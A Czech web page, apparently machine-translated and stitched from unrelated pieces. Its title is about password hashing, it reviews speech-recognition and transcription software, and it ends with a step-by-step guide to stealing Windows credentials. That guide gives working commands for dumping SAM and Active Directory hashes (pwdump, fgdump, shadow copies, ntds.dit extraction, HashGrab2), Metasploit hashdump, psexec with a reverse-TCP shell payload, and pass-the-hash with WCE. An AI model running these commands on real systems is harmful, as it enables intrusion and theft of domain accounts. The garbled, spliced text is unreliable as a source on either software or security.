Hašování hesel c. Bezpečné hašování hesel. Počet možných hesel

Cena: 199,99 $
Vývojář ScanSoft
Webové stránky www.scansoft.com
Velikost č
Stáhnout stránku Ne
+
Nejširší funkčnost; pracovat ve všech aplikacích Windows; výkonné slovníkové databáze
Vysoká cena
! Nejlepší dostupný software pro rozpoznávání řeči

Rozhodně nejlepší existující modul pro rozpoznávání řeči! Během své dlouhé historie prošel Dragon celou obtížnou cestu od vojáka k maršálovi; ne, možná ještě ne do maršála, ale titul armádního generála si určitě zasloužil. Celý algoritmus pro práci s programem je extrémně jednoduchý - připojíme sluchátka a mikrofon k odpovídajícím výstupům ze zvukové karty a spustíme samotný nástroj. Nejprve bude uživatel požádán, aby zkalibroval úroveň zvuku z mikrofonu a nadiktoval do počítače řadu připravených textů pro doladění Dragon Naturally Speaking podle vašeho zabarvení, intonace a výslovnosti. A nakonec interaktivní výukový program, kde se uživatel naučí základní hlasové příkazy.

Stojí za zmínku, že PC není živým partnerem a nemůže dokončit „spolknuté“ slabiky nebo pochopit nečitelně vyslovenou větu. Neméně důležitý je vlastní přízvuk mluvčího – úroveň angličtiny, která například zaznívá na různých mezinárodních vědeckých konferencích, je pro práci z principu nevhodná. Na druhou stranu vždy existuje možnost samoučení: pokud Drak nechce rozpoznat určité slovo, věnujte čas tomu, abyste se podívali do Lingvo a vyslovte ho s přihlédnutím ke správnému přepisu. Ujišťuji vás, že maximálně za týden nebo dva budete nejen snadno diktovat kilobajty textů, ale také se mezi přáteli pochlubit svou pravou anglickou výslovností.

Stále nejste spokojeni s kvalitou rozpoznávání? Obraťte se na místní centrum přesnosti, abyste optimalizovali svůj uživatelský profil a naučili vás, jak přidat oblíbené neologismy do vaší slovní zásoby. Možné jsou i exotičtější akce, jako je rozpoznání textového obsahu souboru wav (včetně z Pocket PC nebo přímo z lineárního výstupu zvukové karty). Dragon Naturally Speaking navíc umí spouštět různé programy, přepínat mezi nimi a dokonce ovládat řadu jejich funkcí (například spouštění/pozastavení přehrávání hudby v přehrávači médií nebo přímo práci s menu). Verze Preferred a Pro-fessional navíc obsahují náš vlastní řečový engine, Real-Speech 2, jeden z nejpokročilejších současnosti.

Ale vraťme se k nahrávání projevu. Potěší především to, že text můžete diktovat nejen v nativním textovém procesoru DragonPad, ale i v jakékoli jiné podobné aplikaci – MS Word, Outlook Express, Internet Ex-plorer a Corel WordPerfect. Program pracuje se stejným úspěchem s ICQ, síťovým chatem (Network Assistant) a dalšími instant messengery; poté se však některé příkazy stanou nedostupnými, ale dokonce i pro odeslání zprávy Vstupte Není třeba mačkat, stačí říct: „Nový odstavec“ – a ICQ to automaticky udělá. Ve specializovanějších aplikacích, zejména ve Wordu, se používají další příkazy: formátování textu, pravopis, úpravy - a to vše výhradně na úkor mluveného jazyka. Pokud by standardní sada objednávek nestačila, můžete si vždy vytvořit vlastní, čímž dále rozšíříte funkčnost Dragonu. S trochou snahy je docela možné napsat stránku textu bez jakýchkoli úprav. Hlavní je správná kombinace intonace a samozřejmě výslovnosti. Nenatahujte své fráze, ale nečmárejte jako kulomet, jinak bude procento správně pochopeného materiálu jistě tíhnout k nule. Navíc není vůbec nutné neustále hledat ve slovníku - i když jste nějakou frázi nevyslovili zcela správně (například jsem velmi rád), kterou program zná, „hádá“, že automaticky opraví text. Úžasný? Vše je o obrovské slovní zásobě, která spolu s pokročilou technologií rozpoznávání řeči nenechává konkurenci žádnou šanci. Jak si nevzpomenout na rané verze Dragonu, se kterými si autor těchto řádků v minulosti hodně vytrpěl, ale nikdy od nich nedosáhl kvalitní práce...

Inteligentní systém rozpoznávání hlasu (IVOS) 2.0.2A
Shareware (30denní zkušební verze, registrace - 50 $)
Vývojář ComunX
Webové stránky www.ivos.biz
Velikost 2,69 MB
Stáhnout stránku ftp://ftp.download.com/
pub/ppd/1007091810190380/
setup_ivos.exe
+
Velikost mikroskopické distribuce; vynikající funkčnost
Režim zkratky řeči ještě není na úrovni Dragonu
! Jedna z nejlepších utilit v této oblasti

Nejskromnější (na velikost distribuce) program v recenzi si vedl překvapivě dobře a do značné míry dostál svému hlasitému jménu. Důvodem je jeho všestrannost, navržená tak, aby zcela vymýtila prostředky „ručního“ zadávání informací. IVOS vám tedy umožňuje: a) rozpoznávat řeč a převádět ji na text v libovolném textovém procesoru kompatibilním s Windows; b) ovládat svůj počítač pomocí různých hlasových příkazů a vytvářet si vlastní; c) voice over e-books pomocí externích hlasových modulů. Plus samozřejmě takové maličkosti, jako je extrahování textu ze souborů Wav, pohodlný ovládací panel programu, který nezatěžuje obrazovku, a přijatelná (ve srovnání se stejným Dragonem) cena. Po registraci má uživatel přístup k technologii VoiceTouch, která umožňuje učit PC vlastní verbální příkazy.

Efektivita provádění příkazů je překvapivě vysoká – možná dokonce lepší než Realize Voice. Ale úroveň uznání „přednášek“ bude nižší, což není nic divného: jedna věc je pochopit pár slov a úplně jiná je pochopit celou větu. Je třeba poznamenat, že IVOS, stejně jako mnoho jiných programů pro rozpoznávání řeči, kromě Dragonu, pro takové účely používá modul Speech API od společnosti Microsoft a jeho účinnost v této oblasti přímo závisí na tvůrčím úspěchu této korporace. Přesto můžete nyní dosáhnout vysoce kvalitní práce z IVOS tím, že do programu načtete všechny výukové texty, které má na skladě. Samozřejmě, že nakonec nedosáhne úrovně Dragon Naturally Speaking, ale je docela schopná psát nepříliš složité dokumenty. A pokud pravidelně aktualizujete uživatelský slovník, nebudou s vědeckými termíny žádné zvláštní problémy. Pravda, vyvstává zde dilema - v týdnu, který bude třeba strávit výukou obslužného programu všem záludnostem práce s řečí, lze docela rychle zvládnout metodu psaní desetiprsty na klávesnici... Na druhou stranu kvalifikace uživatele PC se zvýší pouze tehdy, pokud vlastní několik metod zadávání informací do počítače.

Realizujte Voice 4.0

Realizujte Voice 4.0
Shareware (15denní zkušební verze, registrace - 49,00 $)
Developer Realize Software Corporation
Webové stránky www.realizesoftware.com
Velikost 55 MB
Stáhnout stránku
www.realizesoftware.com/
download/RzRV40download.exe (webový instalační program)
+
Nenáročný na uživatelovu výslovnost; velmi široký rozsah příkazů
Kvalita práce by mohla být ještě lepší; instaluje pouze na anglickou verzi Windows
! Ovládejte svůj počítač pouze hlasem

Realize Voice na rozdíl od dříve recenzovaného Dragon Naturally Speaking není příliš schopný těsnopisu (i když takovou funkci ve svém arzenálu má), ale s hlasovými příkazy si poradí bravurně. Pozoruhodné je, že nepotřebujete výjimečně hluboké znalosti angličtiny – díky modulu inteligentního heuristického analyzátoru program snadno najde společný jazyk s téměř každým mluvčím. Rozsah funkcí Realize Voice je poměrně široký: od spouštění spustitelných souborů a zástupců programů až po práci s korespondencí a složitými makry. Stejně jako v jiných podobných programech potřebuje uživatel pouze připojený mikrofon a pár minut na to, aby se dostal na kloub. A než začnete skutečně komunikovat s nástrojem, stojí za to definovat rozsah jeho práce. Ve výchozím nastavení do této kategorie spadají zkratky systémové nabídky, plocha počítače, obsah složky Oblíbené a panely Snadné spuštění a také nedávno otevřené dokumenty a programy. Celý proces je plně automatizovaný a je dokončen doslova okamžitě. Pravda, určité nepohodlí je způsobeno nemožností používat čísla v názvech příkazů - například DOOM 3 můžete spustit pomocí hlasového příkazu pouze přejmenováním jeho zkratky na „DOOM Three“. Totéž mimochodem platí i pro azbuku – ne tak veselá vyhlídka, že? V takovém případě se však vždy můžete uchýlit k ručnímu nastavení programu přímým zadáním cesty k souboru/dokumentu/grafickému obrázku, o který máte zájem atd. Zde na názvu souboru a jeho souřadnicích nezáleží. vše - i když je to abvgd.exe, ano A plocha počítače nebudeš to muset mrzačit. Velmi mě potěšila i sada vestavěných systémových příkazů pro práci s Windows – ač není příliš velká, umí se pohybovat mezi otevřenými okny a emulovat akce nejběžnějších kláves ( Mezerník, Vložit, Domů atd.), vypnutí a zablokování systému s jeho pomocí je docela možné.

Něco málo o makrech. Obslužný program umožňuje kombinovat celou řadu operací pod jedním příkazem – od zadávání znaků z klávesnice a systémových příkazů až po syntézu řeči pomocí vestavěného hlasového enginu. Pravda, taková idylka, jako je nahrání CD pomocí jediné fráze, je ještě daleko, ale čas ukáže... Hlavní je, že nyní můžete (a ne neúspěšně!) svého miláčka „kormidlovat“ bez jakýchkoliv anachronismů jako myš a klávesnice. Zkuste to - nebudete litovat!

Hlasové studio 1.4.6

Hlasové studio 1.4.6
Shareware (7denní zkušební verze, registrace - 20,97 $)
Vývojářské Ultimate Interactive Desktop's
Webové stránky www.voicestudio.us
Velikost 57 MB
Stáhnout stránku
ftp://ftp.voicestudio.us/
pub/dl2/vssetup.exe
+
Vynikající funkčnost; přítomnost „živé“ animované postavy; velmi nízká cena
MS SAPI se používá pro rozpoznávání řeči; poměrně vysoká náročnost na zdroje
! Skvělý doplněk k Dragonu pro ovládání počítače hlasem

Možná je to jeden z mála, ne-li jediný, takových programů, kde náš virtuální partner na druhé straně monitoru konečně získal hmotnou podobu. A přestože technologii MS Agent, která se k těmto účelům používá, lze jen stěží označit za prototyp umělé inteligence, má pro to všechny předpoklady. Animovaný asistent je nejen obdařen jistou mírou nezávislosti, ale umí reagovat i na řadu standardních frází (jako „Ahoj!“, „Jak se cítíš“, „Špatný počítač“ atd.). V případě potřeby lze snadno doplnit jeho slovní zásobu a frazeologickou zásobu a navíc lze jeho akce nastavit podle jeho „nálady“. I když bude takové tlachání s PC omezeno rozsahem znalostí programu, nikdo se neobtěžuje je rozšiřovat téměř donekonečna. A tam je to jen co by kamenem dohodil od notoricky známé AI... Nicméně to trochu odbočím.

Ve skutečnosti je vše v pořádku s funkčností Voice Studia - zkratka (ačkoli Dragon je mnohem lepší), různé hlasové příkazy (pro větší pohodlí a rychlejší zapamatování je lze vytisknout), stejně jako přijatelná strojová syntéza řeči. Mezi vážnější věci patří vytváření maker pro spuštění řady operací najednou pomocí jednoho klíčového slova, dokonce i nahrávání a přehrávání pohybů myši! Dovolte mi připomenout, že poslední „funkce“ je široce používána v mnoha alternativních prohlížečích, jako je GreenBrowser nebo MyIE2, k provádění řady akcí (přechod na jinou stránku, otevření nového okna atd.). Nyní nepotřebujete žádná zbytečná gesta – stačí říct příslušný příkaz a počítač automaticky znovu vytvoří dříve zaznamenaný skript. Kdo ví, možná brzy budeme moci hrát hry pouze s mikrofonem? Čas ukáže…

Mezitím si Voice Studio bezpochyby zaslouží nejvyšší hodnocení za úžasnou přívětivost a snadné použití. Možná ještě neumí správně nahrávat řeč, ale ovládání PC hlasem je prostě nesrovnatelné. Nejlepší z těchto nástrojů a důstojný doplněk k Dragonu!

Diktát 2004 v.4.5.2399

Diktát 2004 v.4.5.2399
Shareware (7denní zkušební verze, registrace - 49,99 $)
Vývojář United Research Labs
Webové stránky www.research-lab.com
Velikost 41 MB
Stáhnout stránku
www.bandwidthsaver.com/
downloads/dict2002.zip
+
Základní sada funkcí pro ovládání PC a záznam řeči; skvělá práce se soubory wav
Ne nejlepší výkon rozpoznávání řeči; otravný modul pro úpravu textu
! Příliš málo za tuto cenu

I přes zdánlivě zcela standardní základní dovednosti se Dictation 2004 stále může něčím pochlubit. V první řadě je to technologie Point-and-Speak, která umožňuje snadno vytvářet příkazy pro zadávání hesel, spouštění softwaru a diktování téměř ve všech aplikacích Windows. Ohlášena je integrace s MS Word a také inteligentní technologie pro správnou identifikaci frází. Je pravda, že je implementován extrémně nepohodlným způsobem - ve formě vyskakovacího okna, které se objeví s každým vyřčeným slovem a pouze odrazuje jakoukoli chuť do práce. Je dobře, že to můžeš vypnout. Dictation 2004 používá stejné SAPI 5.1, takže se jeho kvalita zásadně neliší od jiných softwarů založených na stejné technologii (Voxx, IVOS, Realize Voice atd.). Z doplňkových funkcí stojí za zmínku WAV Recorder pro zachycení informací z audiokazet, mobilních zařízení, mikrofonů a jejich následný záznam do souborů wav; pak je z nich text extrahován pomocí samostatného apletu Diktování - Wave-to-Text. Zatím to má samozřejmě k ideálu ještě daleko, ale pokud bude mít hlasatel čistý projev a dobrou výslovnost, tak problémy nebudou.

+
Všestrannost v práci; různé možnosti
— „Trénink“ programu zabere hodně času ! Zajímavý produkt, ale mohl by být lepší...

Další „jack of all trades“, který vám umožní chatovat podle libosti s vaším PC. Seznam funkcí programu je velmi podobný seznamu IVOS (stenografie/hlasové příkazy/čtení textu), kromě toho, že je zde užitečný bonus – pečlivé hlasové ovládání každé vaší akce, ať už jde o psaní nebo otevírání souboru. Program používá stejné rozhraní Microsoft Speech API jako IVOS, takže kvalita jeho rozpoznávání je podobná. K dispozici je dobrá sada hlasových příkazů pro navigaci v prohlížeči, základní operace v textovém editoru (vyjmout/kopírovat/vložit atd.), stejně jako práci s okny, nechybí zkratky pro vyvolání systémových appletů, dokonce i otevření/zavření zásobník na optickou mechaniku - obecně vše pro pohodlnou práci. Pokud jde o syntézu řeči, ta přímo závisí na odpovídajících modulech nainstalovaných v systému. Bezplatné enginy od Microsoftu, které jsou součástí programu, nejsou zdaleka ideální, ale v zásadě se na ně dá zvyknout. Pohodlnější možností, bohužel, ne zadarmo, je vyzkoušet vývoj třetích stran, zejména Digit PC, který má také velmi dobrý hlasatel v ruském jazyce. S ohledem na všechna pro a proti by byl Voxx vhodným kandidátem na koupi. Mimochodem, zkušební verze je omezena pouze počtem frází/příkazů na relaci; Chcete-li zahájit novou relaci, restartujte program...

Závěr

Přes stále četné nedostatky se programy pro rozpoznávání řeči již přesunuly z řady hraček na seriózní nástroj pro obchodníky. Jestliže dříve byly málo použitelné, nyní mohou uživateli skutečně usnadnit život a zničit dříve neotřesitelný stereotyp, že počítač je jen železná krabice, která drtí čísla. A samozřejmě nejpříjemnějším faktem je možnost zažít technologický pokrok 21. století, o kterém tak často psali četní spisovatelé sci-fi, právě teď. Připoj se k nám!

Snad nejpohodlnější program pro přepis textu pro Windows a Mac OS, který kombinuje audio přehrávač a textový editor. Princip fungování je velmi jednoduchý – nahrajte do programu zvukový soubor, poslouchejte jej pomocí horkých kláves na klávesnici (můžete si je přiřadit sami) a zároveň zadejte text. Rychlost přehrávání a hlasitost zvuku se také nastavují pomocí klávesnice. Vaše ruce tak budou vždy na klávesnici a není třeba používat myš ani přepínat mezi různými programy. Upozorňujeme, že vestavěný textový editor nerozpozná chyby a nemá mnoho dalších známých funkcí, například přepínání pomlček na pomlčky. Paralelně s Express Scribe však můžete používat další textové editory pomocí klávesových zkratek pro ovládání přehrávání zvuku. Program je shareware, plná cena: 17-50 $.


02. Transcriber-pro



Ruský program pro Windows, který vám umožní poslouchat nejen zvuk, ale také prohlížet video soubory. Vestavěný textový editor má schopnost přidávat časová razítka a jména účastníků rozhovoru. Výsledný text lze importovat do „interaktivních přepisů“ a lze jej také upravit v rámci skupinového projektu. Aplikace je k dispozici pouze s ročním předplatným, cena je 689 rublů ročně.


03. RPlayer V1.4



Jednoduchý program pro zpracování a přepis zvukových souborů s podporou klávesových zkratek a schopností psát v aplikaci Microsoft Word. Na rozdíl od předchozích podobných programů jej lze stáhnout zdarma, na nových verzích Windows je však nestabilní.

04. Voco

Profesionální Windows aplikace pro převod řeči na text. Podporuje hlasové zadávání v jakémkoli testovacím prohlížeči, má velkou sbírku tematických slovníků a pro rozpoznávání řeči nevyžaduje připojení k internetu. Rozšířené verze „Voco.Professional“ a „Voco.Enterprise“ umí pracovat s hotovými zvukovými soubory. Jedinou nevýhodou je vysoká cena aplikace.


05. Dračí diktát



Bezplatná mobilní aplikace pro rozpoznávání diktátu. Program dokáže rozpoznat asi 40 jazyků a jejich odrůd, umožňuje upravovat text a odesílat jej na e-mail, sociální sítě nebo kopírovat do schránky. K provozu je nutné připojení k internetu.


06. RealSpeaker



Unikátní aplikace, která dokáže nejen rozpoznat zvukové soubory, ale také živou řeč mluvenou do kamery. Díky speciálnímu rozšíření videa „RealSpeaker“ čte pohyby rtů, čímž zlepšuje proces rozpoznávání řeči až o 20–30 % ve srovnání s jinými podobnými algoritmy. V současné době aplikace podporuje 11 jazyků: ruština, angličtina (americké a britské dialekty), francouzština, němčina, čínština, korejština a japonština, turečtina, španělština, italština a ukrajinština. Program je distribuován zdarma, cena závisí na délce předplatného, ​​neomezená verze stojí asi 2 000 rublů.

Tento článek je kompletní sbírkou receptů, které popisují, jak vypsat hodnoty hash uživatelských hesel, obnovit původní heslo pomocí hrubé síly a použít extrahovaný hash k získání přístupu k chráněným zdrojům pomocí chyb v ověřovacím protokolu NTLM. Minimum teorie - pouze praxe. Vše jsme shromáždili na jednom místě a vytvořili kompletní manuál.

VAROVÁNÍ

Veškeré informace jsou poskytovány pouze pro informační účely. Redakce ani autor nenesou odpovědnost za případné škody způsobené materiály tohoto článku.

Kde jsou hesla?

Okamžitě odpovím na otázku, kde jsou v systému uloženy hash hesel. Obecně je lze získat ze tří míst:

  • z lokální databáze SAM, kde jsou uloženy LM/NTLM hashe místních uživatelů;
  • z mezipaměti LSA, která obsahuje LM/NTLM hashe uživatelů domény, které jsou po restartu vymazány;
  • ze speciální cache, kde jsou uloženy hashe MSCache hesel posledních deseti uživatelů, kteří se k tomuto hostiteli přihlásili (hesla se ukládají do mezipaměti, abyste se mohli přihlásit v případě dočasného výpadku připojení k doméně).

Pokud je použit doménový řadič, je zde také úložiště AD. Je důležité pochopit jednu věc: hesla lze vypsat z každého zadaného umístění! Většina níže uvedených technik je již dlouho známá, ale rozhodli jsme se vytvořit jakousi kompletní sbírku receptů, na které se můžete v případě potřeby vždy odvolat. Níže je 7 hotových receptů.

PwDump a fgdump

Začněme situací, kdy máme fyzický přístup k systému, který nás zajímá. V tomto případě lze hashe NTLM/LM vypsat pomocí speciálních nástrojů. Většina těchto nástrojů vyžaduje vysoká oprávnění, protože jsou nezbytné pro vkládání DLL pomocí SeDebugPrivilege. Pro zjednodušení budeme předpokládat, že máme účet s administrátorskými právy (nebo ještě lépe NT AUTHORITY\SYSTEM).


Pokud máte fyzický přístup, je výměna hashů poměrně jednoduchá: existuje mnoho způsobů a vždy můžete zavést systém z flash disku (nebo LiveCD), například Kon-Boot, a přihlásit se jako jakýkoli uživatel. Existuje mnoho dalších hacků (včetně těch pro zvýšení oprávnění NT AUTHORITY\SYSTEM od místního admina), o kterých jsme nejednou psali v sekci EasyHack minulý rok. Ale vraťme se k procesu extrakce hashů. Nejznámějšími nástroji pro výpis hash jsou pwdump a fgdump. Práce s těmito nástroji je poměrně jednoduchá a funkce jsou velmi podobné. Chcete-li vypsat hash, stačí spustit program:

Pwdump localhost fgdump.exe

První výstup nástroje našel hashe přímo do konzole. Druhý uloží výsledek do souborů 127.0.0.1.PWDUMP (haše hesel místního uživatele) a 127.0.0.1.CACHEDUMP (haše hesel uživatele domény v mezipaměti).

Jedna z nejzajímavějších možností, kterou oba nástroje podporují, umožňuje výpis hashů ze vzdálených počítačů. Chcete-li provést tento trik, řekněme pomocí pwdump, musíte spustit:

> pwdump -o mytarget.log -u MYDOMAIN\someuser -p\"lamepassword" 10.1.1.1

Zde je 10.1.1.1 adresa vzdáleného počítače, MYDOMAIN\someuser je uživatelský účet, lamepassword je uživatelské heslo a mytarget.log je soubor pro uložení výsledků. Na rozdíl od pwdump může fgdump vypsat hash nejen z jednoho počítače, ale z několika najednou:

> fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10

V tomto případě je hostfile.txt soubor obsahující seznam hostitelů, „-T 10“ je počet paralelně běžících vláken. Výsledný hash můžete zkusit hrubou silou pomocí speciálních utilit zjistit původní průchod (celý výběr vhodných nástrojů hledejte v postranním panelu).

Je pozoruhodné, že některé z nich pro větší pohodlí podporují výstupní formát fgdump.exe.

Vypište hesla pomocí služby Stínová kopie svazku

Zatímco utility jako pwdump a fgdump jsou staré sto let, metoda dumpingu hesel, o které bude řeč níže, se objevila relativně nedávno. Nejúžasnější je, že vůbec nevyžaduje nástroje třetích stran a využívá pouze schopnosti samotného systému. Jak již víme, v souboru SAM jsou uloženy také hashe hesel místních uživatelů, i když v zašifrované podobě. K jejich přečtení je tedy nutný další soubor - SYSTEM. Tyto dva soubory jsou systémové větve registru, které OS neustále používá, takže k nim nelze přistupovat ani jako správce. Z tohoto důvodu musí mnoho aplikací, které načítají hodnoty hash hesel, jít do určité míry, aby získaly přístup k těmto větvím. Ke zkopírování těchto souborů použijeme zákonný mechanismus poskytovaný samotným OS. Tento mechanismus, který vám umožňuje pořídit „snímek“ svazku, se nazývá Služba stínové kopie svazku. Objevila se v operačních systémech Windows počínaje verzemi XP a Server 2003. Tato technologie se automaticky používá například při vytváření archivu System State pomocí utility ntbackup nebo při vytváření snímku sdílené složky (Volume Shadow Copy for Shared Folders) . Podstatou myšlenky je, že stínové kopírování vytvoří kopie důležitých systémových souborů (zejména SAM a SYSTEM), ke kterým máme snadný přístup. Abychom se zbavili zbytečné práce v konzoli, použijeme malý skript vssown.vbs, který řídí vytváření kopií. Skript najdete na našem disku. Nejprve spustíme službu stínové kopie: cscript vssown.vbs /start. Poté vytvoříme novou stínovou kopii: cscript vssown.vbs /create. Nyní se podívejte na seznam všech stínových kopií: cscript vssown.vbs /list.

Kopie, kterou vytvoříme, bude nejnovější. Ze všech informací nás zajímá objekt Device s hodnotou “\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14” (zde 14 je číslo stínové kopie). Další manipulace jsou velmi jednoduché.

  1. Zkopírujeme soubory, které nás zajímají: copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\ windows\system32\config\SYSTEM . zkopírujte \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\ windows\system32\config\SAM .
  2. To je vše, nyní mohou být tyto soubory přiváděny do nějakého nástroje, jako je SAMInside, k dešifrování přijatých hashů.

Vypište hesla všech uživatelů domény!

Zajímavé je, že pomocí předchozí techniky můžete snadno uniknout hashe hesel nejen pro místní uživatele, ale obecně pro všechny uživatele domény! Pravda, pouze pokud máme přístup k řadiči domény. Řekněme, že jsme vytvořili stínovou kopii a zkopírovali soubory SAM a SYSTEM. Služba Active Directory ukládá uživatelská data do souboru NTDS.DIT ​​​​, takže je také musíte zkopírovat:

Zkopírujte \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\ windows\ntds\ntds.dit .

Uživatelská data jsou uložena zašifrovaná, takže je bude nutné dešifrovat pomocí SYSTEM. Tak co máme? Máme soubory SYSTEM a NTDS.DIT ​​​​, ale jak získáme seznam uživatelů a jejich hash? Až donedávna to nebylo snadné, protože neexistovaly žádné bezplatné nástroje, které by dokázaly analyzovat NTDS.DIT ​​​​a dešifrovat hashe. Nedávno však výzkumník jménem Csaba Barta vydal sadu nástrojů, která dokáže analyzovat soubor NTDS.DIT ​​​​a extrahovat z něj hash. Celá sada nástrojů je k dispozici na adrese csababarta.com/downloads/ntds skládka hash.zip Podívejme se, jak tato sada nástrojů funguje. Pro další manipulace použijeme BackTrack5 (postačí jakákoli jiná distribuce Linuxu), i když totéž lze provést pod Windows. Spusťte systém, stáhněte si archiv sady nástrojů a rozbalte jej. Dále sestavíme knihovnu libesedb:

Cd libesedb chmod +x configure ./configure && make

Nyní můžete začít ukládat hash. Nejprve načteme tabulku obsahující zašifrovaná data:

CD esedbtools ./esedbdumphash ../../ntds.dit

Nyní máme soubor /libesedb/esedbtools/ntds.dit.export/datatable. Již zisk. Nyní je třeba jej dešifrovat pomocí klíče obsaženého v SYSTEM:

Cd ../../creddump/ python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

Připraveno! Výstupem jsou hashe všech uživatelů domény! Zajímavé je, že můžete také extrahovat předchozí uživatelská hesla (jejich hash). Pro tento účel má sada nástrojů samostatný nástroj, který se snadno používá:

Python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable.

Pokud se dají prolomit, je docela dobře možné vysledovat vzor, ​​podle kterého si uživatel mění hesla (velmi často existuje).

HashGrab2 + samdump2

Pro výpis hashů není nutné se přihlašovat do systému. Opět, pokud máte fyzický přístup ke svému počítači, můžete si nejen stáhnout nástroj pro resetování hesla z LiveCD (řekněme Offline NT Password & Registry Editor), ale také snadno vypsat hash pomocí speciálního softwaru – samozřejmě, protože neexistují systémové soubory zásad přístupu zde nemají žádný vliv. Použijeme HashGrab2 a utility, které lze spustit z téměř jakékoli distribuce LiveCD. HashGrab2 automaticky připojí všechny oddíly Windows, které najde, a pomocí samdump2 extrahuje přihlašovací údaje a hash hesel ze souborů SAM a SYSTEM. V praxi to vypadá takto:

> sudo ./hashgrab2.py HashGrab v2.0 od s3my0n http://InterN0T.net Kontakt: RuSH4ck3Rgmailcom [*] Připojeno /dev/sda1 k /mnt/jomAT8 [*] Připojeno /dev/sdb1 k /mnt/AZwJUs [ *] Kopírování souborů SAM a SYSTEM... [*] Odpojování oddílů... [*] Mazání připojovacích adresářů... [*] Mazání [./jomAT8"] >$ ls hashgrab2.py jomAT8.txt >$ cat ./jomAT8.txt Správce:HASH Host:501:HASH s3my0n:1000:HASH HomeGroupUser$:1002:HASH

Výsledné hashe mohou být okamžitě napájeny hrubou silou.

Vypněte mezipaměť hash hesel

Jak víte, systém Windows ukládá do mezipaměti hodnoty hash hesel a přihlášení uživatelů domény, což vám umožňuje přihlásit se k počítači, pokud je řadič domény zakázaný a nepřístupný. Pokud uživatel zadá správné přihlašovací jméno a heslo, pak během autorizace systém uloží hash hesla na disk. Jak sami chápete, uchovávat taková data na disku není z bezpečnostního hlediska nejlepší řešení, proto je lepší tuto funkci zakázat. Chcete-li to provést, musíte nainstalovat klíč HKEY MÍSTNÍ MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\cachedlogonscount na "0". Poté musíte restartovat počítač, abyste odstranili všechna dříve uložená hesla. Od této chvíle nebude systém Windows ukládat hesla uživatelů domény do mezipaměti.

Funkce Metasploit

Předpokládejme nyní, že nemáme fyzický přístup k počítači. Mějme místo toho vzdálený shell a v ideálním případě Meterpreter. Metasploit Framework již má vestavěnou funkci pro načtení seznamu uživatelů a hash hesel. To se provádí jedním příkazem:

Meterpreter > spustit post/windows/gather/hashdump

V důsledku toho získáme seznam uživatelů a hashů. Ale neměli byste se tam zastavit. Metasploit je multifunkční věc, takže se můžete pokusit použít získané hashe pro přístup k dalším počítačům v síti oběti - možná to bude fungovat. K tomu je užitečný modul PsExec:

Meterpreter > použít exploit/windows/smb/psexec meterpreter > nastavit užitečné zatížení windows/meterpreter/reverse_tcp meterpreter > nastavit rhost [adresa vzdáleného hostitele] meterpreter > nastavit smbpass [dříve získaný hash uživatele] meterpreter > nastavit smbuser [přihlášení uživatele] meterpreter > nastavit lhost [adresa místního stroje] meterpreter > exploit meterpreter > shell - obdržel shell na vzdáleném počítači

Jak vidíte, vše se děje automaticky, bez jakýchkoli potíží. Chcete-li si dále pohrávat se systémovými soubory, je užitečné okamžitě zvýšit práva. Můžete je získat přímo z MeterPreter, který má jednoduchý příkaz getsystem. Tento modul se pokusí povýšit práva v OS pomocí zranitelnosti MS09-012, stejně jako senzační zranitelnosti MS10-015 (KiTrap0D) a dalších.


Cain&Abel je další skvělý nástroj pro NTML hashe hrubou silou
(navíc podporuje hacking hash velkého množství dalších algoritmů)

Technika Pass-the-Hash

V obou implementacích protokolu NTLM je velká díra. Pro autentizaci stačí znát pouze hash uživatele, to znamená, že ani nemusíte nic hrubou silou. Máte hash - a můžete šplhat po mřížce s právy kompromitovaného uživatele :). Odpovídající metoda nazvaná Pass The Hash byla vyvinuta již v roce 1997. Jednou z jeho nejznámějších implementací je Pass-the-Hash Toolkit. Obsahuje tři nástroje: IAM.EXE, WHOSTHERE.EXE a GENHASH.EXE. Jak název napovídá, GENHASH je navržen tak, aby generoval LM a NT hashe hesla, které mu bylo přiděleno. WHOSTHERE.EXE zobrazuje všechny informace o přihlašovacích relacích, které operační systém ukládá do paměti. Nástroj zobrazuje informace o uživatelích, kteří jsou aktuálně přihlášeni do systému: uživatelské jméno, doména/pracovní skupina a hash NTLM hesla. Nástroj IAM.EXE vám umožňuje předstírat, že jste jiný uživatel, když získáváte přístup ke složce na vzdáleném počítači a nahrazuje data aktuálního uživatele (přihlašovací jméno, hash hesla, doménu atd.), když jsou odeslána v mezipaměti vzdálenému počítači. systém tak, aby mohl identifikovat uživatele a rozhodnout, zda mu udělí přístup k požadovanému zdroji. Po úspěšném spoofingu všechna síťová připojení ke vzdáleným serverům, které se ověřují pomocí NTLM hash, používají podvržená data, což umožňuje přístup k „cizí“ sdílené složce. Podívejme se na příklad použití:

whosthere.exe- získáváme údaje všech přihlášených uživatelů; iam.exe -h správce:mojedoména:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0- nahradit svá data daty jiného uživatele.

To je vlastně vše, nyní máme práva pro přístup k síťovým zdrojům jiného uživatele.

Editor přihlašovacích údajů systému Windows


WCE je analogem Pass-the-Hash Toolkit, ale zde je veškerá funkčnost soustředěna do jednoho spustitelného souboru. Tento nástroj se mi líbí víc. Při spuštění bez parametrů aplikace vrátí seznam uživatelů aktuálně přihlášených do systému (utilita stahuje NTLM/LM hashe z paměti):

Wce.exe –l

Poté si z nich můžete vybrat vhodného kandidáta pro naše špinavé činy a použít jeho data. Řekněme, že potřebujeme nahradit naše data daty jiného uživatele a spustit nějaký program údajně pod ním:

Wce.exe -s :::\ -c

Poté spusťte následující příkaz:

Uživatel Wce.exe –s:Oběť:1F27ACDE849935B0AAD3B435B51404EE:579110C49145015C47ECD267657D3174 -c "c:\Program Files\Internet Explorer\iexplore.exe"

Zde "-s" "přidá" nového uživatele s názvem user a domain Victim, za nímž následuje LM a NTLM hash a "-c" specifikuje, který program by měl být spuštěn pod tímto uživatelem. Jak vidíte, vše je docela jednoduché. 🙂

Programy pro crackování hashů

SAMInside

